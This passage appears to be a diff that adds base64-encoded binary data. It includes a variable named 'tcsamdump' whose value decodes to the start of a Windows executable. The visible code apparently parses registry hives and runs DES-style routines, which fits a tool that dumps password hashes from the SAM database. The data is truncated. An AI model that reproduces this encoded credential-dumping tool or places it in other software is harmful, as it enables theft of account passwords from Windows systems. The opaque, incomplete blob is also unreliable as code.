+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA8AAA +AAIwCDAOMBMwGTAgMCUwKjAzMDgwPjBGMEswUTBYMF0wYjBrMHAwdjB+MIMwiTCQMJUwmjCjMKgw +szC9MMcw0TDbMOUwLjE5MT8xXDGmMasxoTIyMz8zRjNjM3YzuDPVM/0zFTQfNEc0aTRzNJs0xDTc +NAQ1PzVYNXw1kzWdNcU10DVCNnc2hjaxNtQ25Tb2Ng83FjcbNyY3QjdIN043sDfxN1o4dDh9OMA5 +xznWOd456TnvOfU5/zkXOhw6JjpAOk46VjpcOp86sToNOyg7NztTO6w7tDsOPBs8vjzNPOM8Ez7N +Ptc/AAAAIAAAEAEAAB4wPzBWMMswkzOXM5sznzOjM6czqzOvM300iDSNNJc0nDTUNOA05zT3NP00 +BDUONSc1LzU0NUA1RTViNWg1ojWqNcQ1yjXbNfQ1ADYGNhM2IzYpNjE2TzZVNmY2fTaHNqA2Ajca +NyA3SjdQN3I3hje4N7831DcGOBA4MThGOGo4lDiiONM42TjmOAc5LDk7OUo5fDmMOc852znlOfk5 +BzoUOhk6Hzp6OoE6yToOO/E7Cjw/PEc8YTxtPH08vDwMPR89XT2BPYg9mT2fPa89tj29PcU97D34 +PQI+Cj4SPhg+Jj41Pkc+bT56Pog+kz6mPs0+3D4ePzI/UD9cP3g/jT+jP6o/uD/LPwAwAABEAQAA +QjBPMHQwkDCjMBcxtzEEMhwyMTJ7MsMy2jLnMgEzDzMdMygzPDNCM1AzWTNqM4YzlTOnM7AzzDPv +M/kzAjQeNEE00TTZNN805zQyNVc1aTVvNXg2fjaGNo42ljaiNqc2sza7NsM2yzbhNuk28Tb5NgE3 +FDccN0k3ZDd0N3o3qTfRN9c34zdJOE84VziaONQ42jj9ORk6JjozOkY6TzpbOo06nzquOs861Tr2 +OgA7CzsQOxg7LztEO0o7UjtaO2U7kzufO6k7tDu+O8g7zjsRPBs8IDwlPCo8QzxJPLg8vjzcPO08 +AD0VPTM9QT1OPV49fz2LPZ09qz26Pcs9GD4wPjc+Pz5EPkg+TD51Pps+tT68PsA+xD7IPsw+0D7U +Ptg+Ij8oPyw/MD80P5o/pT/AP8c/zD/QP9Q/8T8AAABAAAAAAQAAGzBNMFQwWDBcMGAwZDBoMGww +cDC6MMAwxDDIMMwwHjEkMSsxNDE7MUMxSTFUMVwxqzO5M78z2TPeM+0z8zMDNA40IDQzND40RDRJ +NE80XDR5NH80ijSQNJo0oDSwNLY0+jSgNY03mDegN7M3uTfPN9Y33DfmN+w38Tf3Nwc4EDgqODs4 +QThUOLY4YzlsOXI5fjmDOY05lDmcOaI5qTmuOb852zn9Ogo7Lzt6O4k7qTvLO/g7DDxGPE08czyL +PKU8sDzGPM489zwEPQk9Fj0iPdw94z38PT4+UD7ZPvk+/j4dPyo/Nz9BP0s/Uz9hP38/nD+0P9Q/ +AAAAUAAAwAAAACwwQjB1MN0wAjFIMU0xaTF8MYMxlTGdMa0xvjHRMekxCTJfMnEyyDLgMucy7zL0 +Mvgy/DIlM0szZTNsM3AzdDN4M3wzgDOEM4gz0jPYM9wz4DPkM0o0VTRwNHc0fDSANIQ0oTTLNP00 +BDUINQw1EDUUNRg1HDUgNWo1cDV0NXg1fDVJNlk2izaVNmY4eTj4OAI5Hjl+OcY5zDnaOSk6WTq0 +Oro6yDomO1U7ZDu8O/Q7BjwZPFU8nj0AYAAAGAAAAPQw+DCsNLA0uDS8NMQ0yDQAcAAAyAAAAAww +EDAcMPQy+DL8MjQzPDNEM0wzVDNcM2QzbDN0M3wzhDOMM5QznDOkM6wztDO8M8AzyDNANkQ2SDZM +NlA2VDZYNlw2dDiUOKQ4tDhQPVg9XD1gPWQ9aD1sPXA9dD14PXw9gD2EPYg9jD2QPZQ9mD2cPaA9 +pD2oPaw9sD20Pbg9vD3APcQ9yD3MPdA91D3YPdw94D3kPeg97D3wPfQ9+D38PQA+ED4UPhg+HD4g +PiQ+KD4sPjA+ND5APtwsamdump="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v +ZGUuDQ0KJAAAAAAAAABQRQAATAEFAHD4djQAAAAAAAAAAOAADgELAQMKALIAAABqAAAAAAAAAFIA +AAAQAAAA0AAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABQAQAABAAAAAAAAAMAAAAAABAA +ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAgAQAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAADABAOwKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAYIQEA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAhLEAAAAQAAAAsgAAAAQA +AAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAAgfAAAA0AAAACAAAAC2AAAAAAAAAAAAAAAAAABAAABA +LmRhdGEAAAAULwAAAPAAAAAcAAAA1gAAAAAAAAAAAAAAAAAAQAAAwC5pZGF0YQAAJAYAAAAgAQAA +CAAAAPIAAAAAAAAAAAAAAAAAAEAAAMAucmVsb2MAACQQAAAAMAEAABIAAAD6AAAAAAAAAAAAAAAA +AABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +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 +M/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvD +JQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBA +ADOvANlAAIt+CDOrANpAAIteDDPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA +3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml//// +/MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+EDOrANpAAIteFDPVM/oz2ovHJQD8AADB6AjB +ywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACL +xyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBAADOvANlAAIt+GDOrANpA +AIteHDPNM/kz2cHLBIvHi+slAPwAAIHlAPwAAMHoCMHtCIuAANtAADOFANxAAIvvgeUAAPwAwe0Q +M4UA3UAAi+uB5QAA/ADB7RAzhQDeQACDxiCL74Hn/AAAAIHl/////MHtGDOFAN9AAIvrgeX////8 +geP8AAAAwe0YM4UA4EAAM4cA2UAAM4MA2kAAM9D/TCQQD4XT/f//6TMCAADHRCQQBAAAAIPGeIs+ +i14EM/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1A +AIvDJQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOo +AOBAADOvANlAAIt++DOrANpAAIte/DPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegI +M6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml +/////MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+8DOrANpAAIte9DPVM/oz2ovHJQD8AADB +6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADe +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 